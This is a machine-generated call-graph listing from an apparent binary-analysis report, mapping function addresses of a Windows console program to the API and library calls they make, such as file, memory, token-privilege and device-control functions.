3a0e1d 75305 3a0416 18 API calls 2 library calls 75199->75305 75201 3a0ea6 75307 3cec78 free ctype 75201->75307 75202 3a0d11 75299 387496 7 API calls 2 library calls 75202->75299 75203 3a0c13 75296 381e40 free 75203->75296 75204 3a0c83 75204->75199 75204->75202 75206 382da9 2 API calls 75206->75265 75210 382da9 2 API calls 75248 3a0ab5 75210->75248 75211 3a0e47 75211->75201 75306 3a117d 68 API calls 2 library calls 75211->75306 75212 3a0de0 75301 3b2db9 free ctype 75212->75301 75214 382f1c 2 API calls 75242 3a0d29 75214->75242 75215 3a0df8 75303 381e40 free 75215->75303 75216 382e04 2 API calls 75216->75265 75218 382e04 2 API calls 75218->75248 75221 3a0e02 75304 3b2db9 free ctype 75221->75304 75223 382e04 2 API calls 75223->75242 75225 382fec 3 API calls 75225->75265 75229 382fec 3 API calls 75229->75242 75230 382fec 3 API calls 75230->75248 75234 3a050b 44 API calls 75234->75248 75236 3a0b26 75288 381e40 free 75236->75288 75237 3a0df3 75302 381e40 free 75237->75302 75240 381e40 free ctype 75240->75242 75241 3c04d2 malloc _CxxThrowException free _CxxThrowException memcpy 75241->75265 75242->75212 75242->75214 75242->75215 75242->75223 75242->75229 75242->75237 75242->75240 75300 3a117d 68 API calls 2 library calls 75242->75300 75244 3a0b30 75289 381e40 free 75244->75289 75245 3a0c79 75298 381e40 free 75245->75298 75248->75203 75248->75210 75248->75218 75248->75230 75248->75234 75248->75245 75251 381e40 free ctype 75248->75251 75287 382f4a malloc _CxxThrowException free ctype 75248->75287 75292 381089 malloc _CxxThrowException free _CxxThrowException 75248->75292 75293 3a13eb 5 API calls 2 library calls 75248->75293 75294 3a0ef4 68 API calls 2 library calls 75248->75294 75295 3b2db9 free ctype 75248->75295 75297 3a0021 GetLastError 75248->75297 75249 3a0b38 75290 381e40 free 75249->75290 75251->75248 75260 381524 malloc _CxxThrowException 75260->75265 75261 3a0b48 75291 3b2db9 free ctype 75261->75291 75264 381e40 free ctype 75264->75265 75265->75198 75265->75204 75265->75206 75265->75216 75265->75225 75265->75236 75265->75241 75265->75248 75265->75260 75265->75261 75265->75264 75266 3b2db9 free ctype 75265->75266 75270 382f4a malloc _CxxThrowException free ctype 75265->75270 75271 381089 malloc _CxxThrowException free _CxxThrowException 75265->75271 75272 3a13eb 5 API calls 2 library calls 75265->75272 75273 3a050b 75265->75273 75278 3a0021 GetLastError 75265->75278 75279 3849bd 9 API calls 2 library calls 75265->75279 75280 3a0306 12 API calls 75265->75280 75281 39ff00 5 API calls 2 library calls 75265->75281 75282 3a057d 16 API calls 2 library calls 75265->75282 75283 3a0f8e 24 API calls 2 library calls 75265->75283 75284 38472e CharUpperW 75265->75284 75285 398984 malloc _CxxThrowException free _CxxThrowException memcpy 75265->75285 75286 3a0ef4 68 API calls 2 library calls 75265->75286 75266->75265 75267->75152 75268->75149 75269->75151 75270->75265 75271->75265 75272->75265 75274 386c72 44 API calls 75273->75274 75277 3a051e 75274->75277 75275 3a0575 75275->75265 75276 382f88 3 API calls 75276->75275 75277->75275 75277->75276 75278->75265 75279->75265 75280->75265 75281->75265 75282->75265 75283->75265 75284->75265 75285->75265 75286->75265 75287->75248 75288->75244 75289->75249 75290->75198 75291->75236 75292->75248 75293->75248 75294->75248 75295->75248 75296->75198 75297->75248 75298->75204 75299->75242 75300->75242 75301->75198 75302->75215 75303->75221 75304->75198 75305->75211 75306->75211 75307->75198 75309 3890e4 __EH_prolog 75308->75309 75310 382f88 3 API calls 75309->75310 75312 3890f7 75310->75312 75311 38915d 75313 382e04 2 API calls 75311->75313 75312->75311 75317 389109 75312->75317 75314 389165 75313->75314 75315 3891be 75314->75315 75318 389174 75314->75318 75354 386332 6 API calls 2 library calls 75315->75354 75319 382e47 2 API calls 75317->75319 75331 389155 75317->75331 75320 382f88 3 API calls 75318->75320 75323 389122 75319->75323 75322 38917d 75320->75322 75321 3891ca 75359 381e40 free 75321->75359 75322->75321 75352 38859e malloc _CxxThrowException free _CxxThrowException 75322->75352 75349 388f57 memmove 75323->75349 75326 38912e 75329 38914d 75326->75329 75350 3831e5 malloc _CxxThrowException free _CxxThrowException 75326->75350 75328 389185 75333 382e04 2 API calls 75328->75333 75351 381e40 free 75329->75351 75331->74937 75334 389197 75333->75334 75335 3891ce 75334->75335 75336 38919f 75334->75336 75338 382f88 3 API calls 75335->75338 75337 3891b9 75336->75337 75353 381089 malloc _CxxThrowException free _CxxThrowException 75336->75353 75355 383199 malloc _CxxThrowException free _CxxThrowException 75337->75355 75338->75337 75341 3891e6 75356 388f57 memmove 75341->75356 75343 3891ee 75344 3891f2 75343->75344 75345 382fec 3 API calls 75343->75345 75358 381e40 free 75344->75358 75347 389212 75345->75347 75357 3831e5 malloc _CxxThrowException free _CxxThrowException 75347->75357 75349->75326 75350->75329 75351->75331 75352->75328 75353->75337 75354->75322 75355->75341 75356->75343 75357->75344 75358->75321 75359->75331 75361 3b5689 75360->75361 75362 3b56b1 75360->75362 75364 3b5593 6 API calls 75361->75364 75378 3b5593 75362->75378 75366 3b56a5 75364->75366 75368 3828a1 5 API calls 75366->75368 75368->75362 75370 3b570e fputs 75376 381fa0 fputc 75370->75376 75372 3b56ef 75373 3b5593 6 API calls 75372->75373 75374 3b5701 75373->75374 75375 3b5711 6 API calls 75374->75375 75375->75370 75376->74974 75377->74976 75379 3b55ad 75378->75379 75380 3828a1 5 API calls 75379->75380 75381 3b55b8 75380->75381 75382 38286d 5 API calls 75381->75382 75383 3b55bf 75382->75383 75384 3828a1 5 API calls 75383->75384 75385 3b55c7 75384->75385 75386 3b5711 75385->75386 75387 3b56e0 75386->75387 75388 3b5721 75386->75388 75387->75370 75392 382881 malloc _CxxThrowException free memcpy _CxxThrowException 75387->75392 75389 3828a1 5 API calls 75388->75389 75390 3b572b 75389->75390 75393 3b55cd 6 API calls 75390->75393 75392->75372 75393->75387 75394->74982 75404 381e40 free 75395->75404 75397 3a2c16 75405 381e40 free 75397->75405 75399 3a2c1e 75400 381e40 free 75399->75400 75400->74986 75401->74988 75402->74990 75403->74992 75404->75397 75405->75399 76225 387b20 76228 387ab2 76225->76228 76229 387ac5 76228->76229 76236 38759a 76229->76236 76232 387b03 76250 387919 76232->76250 76233 387aeb SetFileTime 76233->76232 76237 3875a4 __EH_prolog 76236->76237 76266 38764c 76237->76266 76239 3875af 76240 3875e9 76239->76240 76241 3875d4 CreateFileW 76239->76241 76249 387632 76239->76249 76242 382e04 2 API calls 76240->76242 76240->76249 76241->76240 76243 3875fb 76242->76243 76269 388b4a 76243->76269 76245 387611 76246 38762a 76245->76246 76247 387615 CreateFileW 76245->76247 76274 381e40 free 76246->76274 76247->76246 76249->76232 76249->76233 76251 387aac 76250->76251 76252 38793c 76250->76252 76252->76251 76253 387945 DeviceIoControl 76252->76253 76254 387969 76253->76254 76255 3879e6 76253->76255 76254->76255 76261 3879a7 76254->76261 76256 3879ef DeviceIoControl 76255->76256 76257 387a14 76255->76257 76256->76257 76258 387a22 DeviceIoControl 76256->76258 76257->76251 76393 38780d 8 API calls ctype 76257->76393 76258->76257 76259 387a44 DeviceIoControl 76258->76259 76259->76257 76392 389252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 76261->76392 76262 387aa5 76264 3877de 5 API calls 76262->76264 76264->76251 76265 3879d0 76265->76255 76267 387661 76266->76267 76268 387656 CloseHandle 76266->76268 76267->76239 76268->76267 76275 388b80 76269->76275 76271 388b6e 76271->76245 76273 382f88 3 API calls 76273->76271 76274->76249 76277 388b8a __EH_prolog 76275->76277 76276 388b55 76276->76271 76276->76273 76277->76276 76278 388c7b 76277->76278 76284 388be1 76277->76284 76279 388d23 76278->76279 76281 388c8f 76278->76281 76280 388e8a 76279->76280 76283 388d3b 76279->76283 76282 382e47 2 API calls 76280->76282 76281->76283 76287 388c9e 76281->76287 76285 388e96 76282->76285 76286 382e04 2 API calls 76283->76286 76284->76276 76288 382e47 2 API calls 76284->76288 76293 382e47 2 API calls 76285->76293 76289 388d43 76286->76289 76290 382e47 2 API calls 76287->76290 76291 388c05 76288->76291 76372 386332 6 API calls 2 library calls 76289->76372 76303 388ca7 76290->76303 76298 388c24 76291->76298 76299 388c17 76291->76299 76295 388eb8 76293->76295 76294 388d52 76296 388d56 76294->76296 76373 38859e malloc _CxxThrowException free _CxxThrowException 76294->76373 76384 388f57 memmove 76295->76384 76383 381e40 free 76296->76383 76301 382e47 2 API calls 76298->76301 76362 381e40 free 76299->76362 76306 388c35 76301->76306 76307 382e47 2 API calls 76303->76307 76305 388ec4 76308 388ec8 76305->76308 76309 388ede 76305->76309 76363 388f57 memmove 76306->76363 76313 388cd0 76307->76313 76385 381e40 free 76308->76385 76387 383221 malloc _CxxThrowException free _CxxThrowException 76309->76387 76367 388f57 memmove 76313->76367 76314 388ed0 76386 381e40 free 76314->76386 76315 388c41 76319 388c6b 76315->76319 76364 3831e5 malloc _CxxThrowException free _CxxThrowException 76315->76364 76316 388eeb 76388 3831e5 malloc _CxxThrowException free _CxxThrowException 76316->76388 76366 381e40 free 76319->76366 76320 388cdc 76323 388d13 76320->76323 76368 383221 malloc _CxxThrowException free _CxxThrowException 76320->76368 76371 381e40 free 76323->76371 76326 388f06 76389 3831e5 malloc _CxxThrowException free _CxxThrowException 76326->76389 76327 388c73 76391 381e40 free 76327->76391 76329 382e04 2 API calls 76334 388ddf 76329->76334 76330 388c60 76365 3831e5 malloc _CxxThrowException free _CxxThrowException 76330->76365 76332 388ced 76369 3831e5 malloc _CxxThrowException free _CxxThrowException 76332->76369 76339 388e0e 76334->76339 76342 388df1 76334->76342 76336 388f11 76390 381e40 free 76336->76390 76337 388d65 76337->76296 76337->76329 76343 382f88 3 API calls 76339->76343 76341 388d08 76370 3831e5 malloc _CxxThrowException free _CxxThrowException 76341->76370 76374 383199 malloc _CxxThrowException free _CxxThrowException 76342->76374 76344 388e0c 76343->76344 76376 388f57 memmove 76344->76376 76348 388e03 76375 383199 malloc _CxxThrowException free _CxxThrowException 76348->76375 76349 388e22 76351 388e26 76349->76351 76352 388e3b 76349->76352 76377 383221 malloc _CxxThrowException free _CxxThrowException 76349->76377 76382 381e40 free 76351->76382 76378 388f34 malloc _CxxThrowException 76352->76378 76356 388e49 76379 3831e5 malloc _CxxThrowException free _CxxThrowException 76356->76379 76358 388e56 76380 381e40 free 76358->76380 76360 388e62 76381 3831e5 malloc _CxxThrowException free _CxxThrowException 76360->76381 76362->76276 76363->76315 76364->76330 76365->76319 76366->76327 76367->76320 76368->76332 76369->76341 76370->76323 76371->76327 76372->76294 76373->76337 76374->76348 76375->76344 76376->76349 76377->76352 76378->76356 76379->76358 76380->76360 76381->76351 76382->76296 76383->76276 76384->76305 76385->76314 76386->76276 76387->76316 76388->76326 76389->76336 76390->76327 76391->76276 76392->76265 76393->76262 76394 3cbf67 76395 3cbf85 76394->76395 76396 3cbf74 76394->76396 76396->76395 76400 3cbf8c 76396->76400 76401 3cbf96 __EH_prolog 76400->76401 76417 3cd144 76401->76417 76405 3cbfd0 76424 381e40 free 76405->76424 76407 3cbfdb 76425 381e40 free 76407->76425 76409 3cbfe6 76426 3cc072 free ctype 76409->76426 76411 3cbff4 76427 39aafa free VariantClear ctype 76411->76427 76413 3cc023 76428 3a73d2 free VariantClear __EH_prolog ctype 76413->76428 76415 3cbf7f 76416 381e40 free 76415->76416 76416->76395 76419 3cd14e __EH_prolog 76417->76419 76429 3cd1b7 76419->76429 76422 3cbfc5 76423 381e40 free 76422->76423 76423->76405 76424->76407 76425->76409 76426->76411 76427->76413 76428->76415 76437 3cd23c 76429->76437 76431 3cd1ed 76444 381e40 free 76431->76444 76433 3cd209 76445 381e40 free 76433->76445 76435 3cd180 76436 3c8e04 memset 76435->76436 76436->76422 76446 3cd2b8 76437->76446 76440 3cd25e 76463 381e40 free 76440->76463 76443 3cd275 76443->76431 76444->76433 76445->76435 76465 381e40 free 76446->76465 76448 3cd2c8 76466 381e40 free 76448->76466 76450 3cd2dc 76467 381e40 free 76450->76467 76452 3cd2e7 76468 381e40 free 76452->76468 76454 3cd2f2 76469 381e40 free 76454->76469 76456 3cd2fd 76470 381e40 free 76456->76470 76458 3cd308 76471 381e40 free 76458->76471 76460 3cd313 76461 3cd246 76460->76461 76472 381e40 free 76460->76472 76461->76440 76464 381e40 free 76461->76464 76463->76443 76464->76440 76465->76448 76466->76450 76467->76452 76468->76454 76469->76456 76470->76458 76471->76460 76472->76461 76473 3bc2e6 76474 3bc52f 76473->76474 76477 3b544f SetConsoleCtrlHandler 76474->76477 76476 3bc53b 76477->76476 76478 417da0 WaitForSingleObject 76479 417dc1 76478->76479 76480 417dbb GetLastError 76478->76480 76481 417ddf 76479->76481 76482 417dce CloseHandle 76479->76482 76480->76479 76482->76481 76483 417dd9 GetLastError 76482->76483 76483->76481 76484 38b5d9 76485 38b5f7 76484->76485 76486 38b5e6 76484->76486 76486->76485 76490 38b5fe 76486->76490 76491 38b608 __EH_prolog 76490->76491 76497 406a40 VirtualFree 76491->76497 76493 38b63d 76494 38764c CloseHandle 76493->76494 76495 38b5f1 76494->76495 76496 381e40 free 76495->76496 76496->76485 76497->76493 76498 406ba3 VirtualFree 76499 391ade 76500 391ae8 __EH_prolog 76499->76500 76550 3813f5 76500->76550 76503 391b32 6 API calls 76505 391b8d 76503->76505 76511 391bf8 76505->76511 76568 391ea4 9 API calls 76505->76568 76506 391b24 _CxxThrowException 76506->76503 76508 391bdf 76509 3827bb 3 API calls 76508->76509 76510 391bec 76509->76510 76569 381e40 free 76510->76569 76513 391c89 76511->76513 76570 3a1d73 5 API calls __EH_prolog 76511->76570 76564 391eb9 76513->76564 76518 391cb2 _CxxThrowException 76518->76513 76551 3813ff __EH_prolog 76550->76551 76552 3a7ebb free 76551->76552 76553 38142b 76552->76553 76554 381438 76553->76554 76571 381212 free ctype 76553->76571 76556 381e0c ctype 2 API calls 76554->76556 76560 38144d 76556->76560 76557 3814f4 76557->76503 76567 3a1d73 5 API calls __EH_prolog 76557->76567 76558 3c04d2 5 API calls 76558->76560 76560->76557 76560->76558 76562 381507 76560->76562 76572 381265 5 API calls 2 library calls 76560->76572 76573 381524 malloc _CxxThrowException __EH_prolog ctype 76560->76573 76563 382fec 3 API calls 76562->76563 76563->76557 76574 389313 GetCurrentProcess OpenProcessToken 76564->76574 76567->76506 76568->76508 76569->76511 76570->76518 76571->76554 76572->76560 76573->76560 76575 38933a LookupPrivilegeValueW 76574->76575 76576 389390 76574->76576 76577 38934c AdjustTokenPrivileges 76575->76577 76578 389382 76575->76578 76577->76578 76579 389372 GetLastError 76577->76579 76580 389385 CloseHandle 76578->76580 76579->76580 76580->76576 76581 3bacd3 76582 3bacf1 76581->76582 76583 3bace0 76581->76583 76583->76582 76587 3bacf8 76583->76587 76588 3bc0b3 __EH_prolog 76587->76588 76591 3a7193 free 76588->76591 76592 3bc0ed 76588->76592 76595 381e40 free 76588->76595 76590 3baceb 76594 381e40 free 76590->76594 76591->76588 76596 381e40 free 76592->76596 76594->76582 76595->76588 76596->76590 76597 3842d1 76598 3842bd 76597->76598 76599 3842c5 76598->76599 76600 381e0c ctype 2 API calls 76598->76600 76600->76599 76604 4069f0 free 76605 41ffb1 __setusermatherr 76606 41ffbd 76605->76606 76610 420068 _controlfp 76606->76610 76608 41ffc2 _initterm __getmainargs _initterm __p___initenv 76609 3bc27c 76608->76609 76610->76608 76611 3ad948 76641 3adac7 76611->76641 76613 3ad94f 76614 382e04 2 API calls 76613->76614 76615 3ad97b 76614->76615 76616 382e04 2 API calls 76615->76616 76617 3ad987 76616->76617 76620 3ad9e7 76617->76620 76649 386404 76617->76649 76622 3ada0f 76620->76622 76623 3ada36 76620->76623 76674 381e40 free 76622->76674 76625 3ada94 76623->76625 76631 382da9 2 API calls 76623->76631 76637 3c04d2 5 API calls 76623->76637 76676 381524 malloc _CxxThrowException __EH_prolog ctype 76623->76676 76677 381e40 free 76623->76677 76678 381e40 free 76625->76678 76627 3ad9bf 76672 381e40 free 76627->76672 76628 3ada17 76675 381e40 free 76628->76675 76631->76623 76633 3ad9c7 76673 381e40 free 76633->76673 76634 3ada9c 76679 381e40 free 76634->76679 76637->76623 76638 3ad9cf 76642 3adad1 __EH_prolog 76641->76642 76643 382e04 2 API calls 76642->76643 76644 3adb33 76643->76644 76645 382e04 2 API calls 76644->76645 76646 3adb3f 76645->76646 76647 382e04 2 API calls 76646->76647 76648 3adb55 76647->76648 76648->76613 76650 38631f 9 API calls 76649->76650 76651 386414 76650->76651 76652 386423 76651->76652 76653 382f88 3 API calls 76651->76653 76654 382f88 3 API calls 76652->76654 76653->76652 76655 38643d 76654->76655 76656 397e5a 76655->76656 76657 397e64 __EH_prolog 76656->76657 76680 398179 76657->76680 76660 3a7ebb free 76661 397e7f 76660->76661 76662 382fec 3 API calls 76661->76662 76663 397e9a 76662->76663 76664 382da9 2 API calls 76663->76664 76665 397ea7 76664->76665 76666 386c72 44 API calls 76665->76666 76667 397eb7 76666->76667 76685 381e40 free 76667->76685 76669 397ecb 76670 397ed8 76669->76670 76686 38757d GetLastError 76669->76686 76670->76620 76670->76627 76672->76633 76673->76638 76674->76628 76675->76638 76676->76623 76677->76623 76678->76634 76679->76638 76683 398906 76680->76683 76681 397e77 76681->76660 76683->76681 76687 398804 free ctype 76683->76687 76688 381e40 free 76683->76688 76685->76669 76686->76670 76687->76683 76688->76683 76689 3ad3c2 76690 3ad3e9 76689->76690 76691 38965d VariantClear 76690->76691 76692 3ad42a 76691->76692 76693 3ad883 2 API calls 76692->76693 76694 3ad4b1 76693->76694 76780 3a8d4a 76694->76780 76697 3a8b05 VariantClear 76699 3ad4e3 76697->76699 76698 3a2a72 2 API calls 76700 3ad54c 76698->76700 76699->76698 76701 382fec 3 API calls 76700->76701 76702 3ad594 76701->76702 76703 3ad5cd 76702->76703 76704 3ad742 76702->76704 76705 3ad7d9 76703->76705 76797 3a9317 76703->76797 76812 3acd49 malloc _CxxThrowException free 76704->76812 76815 381e40 free 76705->76815 76708 3ad754 76711 382fec 3 API calls 76708->76711 76714 3ad763 76711->76714 76712 3ad7e1 76816 381e40 free 76712->76816 76713 3ad5f1 76717 3c04d2 5 API calls 76713->76717 76813 381e40 free 76714->76813 76716 3ad7e9 76719 3a326b free 76716->76719 76720 3ad5f9 76717->76720 76731 3ad69a 76719->76731 76803 3ae332 76720->76803 76721 3ad76b 76814 381e40 free 76721->76814 76724 3ad773 76726 3a326b free 76724->76726 76726->76731 76728 3ad610 76810 381e40 free 76728->76810 76730 3ad618 76732 3a326b free 76730->76732 76733 3ad2a8 76732->76733 76733->76731 76755 3ad883 76733->76755 76736 382fec 3 API calls 76737 3ad361 76736->76737 76738 382fec 3 API calls 76737->76738 76739 3ad36d 76738->76739 76767 3ad0e1 76739->76767 76741 3ad380 76742 3ad38a 76741->76742 76743 3ad665 76741->76743 76745 3c04d2 5 API calls 76742->76745 76744 3ad68b 76743->76744 76811 3acd49 malloc _CxxThrowException free 76743->76811 76747 3a326b free 76744->76747 76748 3ad392 76745->76748 76747->76731 76750 3ae332 2 API calls 76748->76750 76749 3ad67c 76751 382fec 3 API calls 76749->76751 76752 3ad3a1 76750->76752 76751->76744 76753 3a326b free 76752->76753 76754 3ad3b0 76753->76754 76756 3ad88d __EH_prolog 76755->76756 76757 382e04 2 API calls 76756->76757 76758 3ad8c6 76757->76758 76759 382e04 2 API calls 76758->76759 76760 3ad8d2 76759->76760 76761 382e04 2 API calls 76760->76761 76762 3ad8de 76761->76762 76763 3a2b63 2 API calls 76762->76763 76764 3ad8fa 76763->76764 76765 3a2b63 2 API calls 76764->76765 76766 3ad34f 76765->76766 76766->76736 76768 3ad0eb __EH_prolog 76767->76768 76769 3ad10b 76768->76769 76770 3ad138 76768->76770 76771 381e0c ctype 2 API calls 76769->76771 76772 381e0c ctype 2 API calls 76770->76772 76773 3ad112 76770->76773 76771->76773 76774 3ad14b 76772->76774 76773->76741 76775 382fec 3 API calls 76774->76775 76776 3ad17b 76775->76776 76817 387b41 28 API calls 76776->76817 76778 3ad18a 76778->76773 76818 38757d GetLastError 76778->76818 76788 3a8d54 __EH_prolog 76780->76788 76781 3a8e09 76783 38965d VariantClear 76781->76783 76782 3a8e15 76784 3a8e2d 76782->76784 76785 3a8e5e 76782->76785 76786 3a8e21 76782->76786 76789 3a8e11 76783->76789 76784->76785 76787 3a8e2b 76784->76787 76791 38965d VariantClear 76785->76791 76820 383097 malloc _CxxThrowException free SysStringLen ctype 76786->76820 76792 38965d VariantClear 76787->76792 76795 3a8da4 76788->76795 76819 382b55 malloc _CxxThrowException free _CxxThrowException ctype 76788->76819 76789->76697 76791->76789 76794 3a8e47 76792->76794 76794->76789 76821 3a8e7c 6 API calls __EH_prolog 76794->76821 76795->76781 76795->76782 76795->76789 76798 3a9321 __EH_prolog 76797->76798 76799 3a9360 76798->76799 76822 389686 VariantClear 76798->76822 76800 38965d VariantClear 76799->76800 76801 3a93d0 76800->76801 76801->76705 76801->76713 76804 3ae33c __EH_prolog 76803->76804 76805 381e0c ctype 2 API calls 76804->76805 76806 3ae34a 76805->76806 76807 3ad608 76806->76807 76823 3ae3d1 malloc _CxxThrowException __EH_prolog 76806->76823 76809 381e40 free 76807->76809 76809->76728 76810->76730 76811->76749 76812->76708 76813->76721 76814->76724 76815->76712 76816->76716 76817->76778 76818->76773 76819->76795 76820->76787 76821->76789 76822->76799 76823->76807 76824 38b144 76825 38b153 76824->76825 76827 38b159 76824->76827 76826 3911b4 107 API calls 76825->76826 76826->76827 76828 3c0343 76833 3c035f 76828->76833 76830 3c0358 76834 3c0369 __EH_prolog 76833->76834 76850 39139e 76834->76850 76839 3c0143 ctype free 76840 3c039a 76839->76840 76860 381e40 free 76840->76860 76842 3c03a2 76861 381e40 free 76842->76861 76844 3c03aa 76862 3c03d8 76844->76862 76849 381e40 free 76849->76830 76851 3913ae 76850->76851 76852 3913b3 76850->76852 76878 417ea0 SetEvent GetLastError 76851->76878 76854 3c01c4 76852->76854 76858 3c01ce __EH_prolog 76854->76858 76855 3c0203 76879 381e40 free 76855->76879 76857 3c020b 76857->76839 76858->76855 76880 381e40 free 76858->76880 76860->76842 76861->76844 76863 3c03e2 __EH_prolog 76862->76863 76864 39139e ctype 2 API calls 76863->76864 76865 3c03fb 76864->76865 76881 417d50 76865->76881 76867 3c0403 76868 417d50 ctype 2 API calls 76867->76868 76869 3c040b 76868->76869 76870 417d50 ctype 2 API calls 76869->76870 76871 3c03b7 76870->76871 76872 3c004a 76871->76872 76873 3c0054 __EH_prolog 76872->76873 76887 381e40 free 76873->76887 76875 3c0067 76888 381e40 free 76875->76888 76877 3c006f 76877->76830 76877->76849 76878->76852 76879->76857 76880->76858 76882 417d59 CloseHandle 76881->76882 76883 417d7b 76881->76883 76884 417d75 76882->76884 76885 417d64 GetLastError 76882->76885 76883->76867 76884->76883 76885->76883 76886 417d6e 76885->76886 76886->76867 76887->76875 76888->76877 76889 3aa7c5 76907 3aa7e9 76889->76907 76941 3aa96b 76889->76941 76890 3aade3 76994 381e40 free 76890->76994 76892 3aa952 76892->76941 76975 3ae0b0 6 API calls 76892->76975 76893 3aadeb 76995 381e40 free 76893->76995 76897 3aac1e 76981 381e40 free 76897->76981 76898 3aae99 76899 381e0c ctype 2 API calls 76898->76899 76902 3aaea9 memset memset 76899->76902 76905 3aaedd 76902->76905 76903 3aac26 76982 381e40 free 76903->76982 76904 3aadf3 76904->76898 76909 3c04d2 malloc _CxxThrowException free _CxxThrowException memcpy 76904->76909 76996 381e40 free 76905->76996 76907->76892 76914 3c04d2 5 API calls 76907->76914 76974 3ae0b0 6 API calls 76907->76974 76909->76904 76911 3aaee5 76997 381e40 free 76911->76997 76914->76907 76915 3aaef0 76998 381e40 free 76915->76998 76918 3ac430 77000 381e40 free 76918->77000 76921 3aac6c 76983 381e40 free 76921->76983 76922 3ac438 77001 381e40 free 76922->77001 76926 3ac443 77002 381e40 free 76926->77002 76927 3aac85 76984 381e40 free 76927->76984 76930 3ac44e 77003 381e40 free 76930->77003 76931 3aac2e 76999 381e40 free 76931->76999 76933 3ac459 76935 3aad88 76991 3a8125 free ctype 76935->76991 76939 3aad17 76988 3a8125 free ctype 76939->76988 76940 3aad93 76992 381e40 free 76940->76992 76941->76890 76941->76897 76941->76921 76941->76935 76941->76939 76942 3aacbc 76941->76942 76956 39101c 76941->76956 76959 3a98f2 76941->76959 76965 3acc6f 76941->76965 76976 3a9531 5 API calls __EH_prolog 76941->76976 76977 3a80c1 malloc _CxxThrowException __EH_prolog 76941->76977 76978 3ac820 5 API calls 2 library calls 76941->76978 76979 3a814d 6 API calls 76941->76979 76980 3a8125 free ctype 76941->76980 76985 3a8125 free ctype 76942->76985 76946 3aacc7 76986 381e40 free 76946->76986 76947 3aad3c 76989 381e40 free 76947->76989 76948 3aadac 76993 381e40 free 76948->76993 76952 3aace0 76987 381e40 free 76952->76987 76953 3aad55 76990 381e40 free 76953->76990 76958 38b95a 6 API calls 76956->76958 76957 391028 76957->76941 76958->76957 76960 3a98fc __EH_prolog 76959->76960 77004 3a9987 76960->77004 76963 3a9970 76963->76941 76964 3a9911 76964->76963 77008 3aef8d 12 API calls 2 library calls 76964->77008 77048 3cf445 76965->77048 77054 3c5505 76965->77054 77058 3ccf91 76965->77058 76966 3acccb 76966->76941 76967 3acc8b 76967->76966 77066 3a979e VariantClear __EH_prolog 76967->77066 76969 3accb1 76969->76966 77067 3acae9 VariantClear 76969->77067 76974->76907 76975->76941 76976->76941 76977->76941 76978->76941 76979->76941 76980->76941 76981->76903 76982->76931 76983->76927 76984->76931 76985->76946 76986->76952 76987->76931 76988->76947 76989->76953 76990->76931 76991->76940 76992->76948 76993->76931 76994->76893 76995->76904 76996->76911 76997->76915 76998->76931 76999->76918 77000->76922 77001->76926 77002->76930 77003->76933 77005 3a9991 __EH_prolog 77004->77005 77009 3d80aa 77005->77009 77006 3a99a8 77006->76964 77008->76963 77010 3d80b4 __EH_prolog 77009->77010 77011 381e0c ctype 2 API calls 77010->77011 77012 3d80bf 77011->77012 77013 3d80d3 77012->77013 77015 3cbdb5 77012->77015 77013->77006 77016 3cbdbf __EH_prolog 77015->77016 77021 3cbe69 77016->77021 77018 3cbdef 77019 382e04 2 API calls 77018->77019 77020 3cbe16 77019->77020 77020->77013 77022 3cbe73 __EH_prolog 77021->77022 77025 3c5e2b 77022->77025 77024 3cbe7f 77024->77018 77026 3c5e35 __EH_prolog 77025->77026 77031 3c08b6 77026->77031 77028 3c5e41 77036 39dfc9 malloc _CxxThrowException __EH_prolog 77028->77036 77030 3c5e57 77030->77024 77037 389c60 77031->77037 77033 3c08c4 77042 389c8f GetModuleHandleA GetProcAddress 77033->77042 77035 3c08f3 __aulldiv 77035->77028 77036->77030 77047 389c4d GetCurrentProcess GetProcessAffinityMask 77037->77047 77039 389c6e 77040 389c80 GetSystemInfo 77039->77040 77041 389c79 77039->77041 77040->77033 77041->77033 77043 389cef GlobalMemoryStatus 77042->77043 77044 389cc4 GlobalMemoryStatusEx 77042->77044 77045 389d08 77043->77045 77044->77043 77046 389cce 77044->77046 77045->77046 77046->77035 77047->77039 77049 3cf455 77048->77049 77068 391092 77049->77068 77051 3cf478 77051->76967 77055 3c550f __EH_prolog 77054->77055 77084 3c4e8a 77055->77084 77059 3ccf9b __EH_prolog 77058->77059 77060 3cf445 14 API calls 77059->77060 77061 3cd018 77060->77061 77065 3cd01f 77061->77065 77300 3d1511 77061->77300 77063 3cd08b 77063->77065 77306 3d2c5d 11 API calls 2 library calls 77063->77306 77065->76967 77066->76969 77067->76966 77070 38b95a 6 API calls 77068->77070 77069 3910aa 77069->77051 77071 3cf1b2 77069->77071 77070->77069 77072 3cf1bc __EH_prolog 77071->77072 77081 391168 77072->77081 77074 3cf1e6 77074->77051 77075 3cf1d3 77075->77074 77076 3cf21c _CxxThrowException 77075->77076 77077 3cf231 memcpy 77075->77077 77076->77077 77079 3cf24c 77077->77079 77078 3cf2f0 memmove 77078->77079 77079->77074 77079->77078 77080 3cf31a memcpy 77079->77080 77080->77074 77082 39111c 10 API calls 77081->77082 77083 39117b 77082->77083 77083->77075 77085 3c4e94 __EH_prolog 77084->77085 77086 382e04 2 API calls 77085->77086 77187 3c4f1d 77085->77187 77087 3c4ed7 77086->77087 77216 397fc5 77087->77216 77089 3c4f0a 77093 38965d VariantClear 77089->77093 77090 3c4f37 77091 3c4f41 77090->77091 77092 3c4f63 77090->77092 77094 38965d VariantClear 77091->77094 77095 382f88 3 API calls 77092->77095 77096 3c4f15 77093->77096 77097 3c4f4c 77094->77097 77098 3c4f71 77095->77098 77237 381e40 free 77096->77237 77238 381e40 free 77097->77238 77101 38965d VariantClear 77098->77101 77102 3c4f80 77101->77102 77239 395bcf malloc _CxxThrowException 77102->77239 77104 3c4f9a 77105 382e47 2 API calls 77104->77105 77106 3c4fad 77105->77106 77107 382f1c 2 API calls 77106->77107 77108 3c4fbd 77107->77108 77109 382e04 2 API calls 77108->77109 77110 3c4fd1 77109->77110 77111 382e04 2 API calls 77110->77111 77118 3c4fdd 77111->77118 77112 3c5404 77278 381e40 free 77112->77278 77114 3c540c 77279 381e40 free 77114->77279 77116 3c5414 77280 381e40 free 77116->77280 77118->77112 77240 395bcf malloc _CxxThrowException 77118->77240 77120 3c5099 77122 382da9 2 API calls 77120->77122 77121 3c541c 77281 381e40 free 77121->77281 77124 3c50a9 77122->77124 77126 382fec 3 API calls 77124->77126 77125 3c5424 77282 381e40 free 77125->77282 77128 3c50b6 77126->77128 77241 381e40 free 77128->77241 77129 3c542c 77283 381e40 free 77129->77283 77132 3c50be 77242 381e40 free 77132->77242 77134 3c50cd 77135 382f88 3 API calls 77134->77135 77136 3c50e3 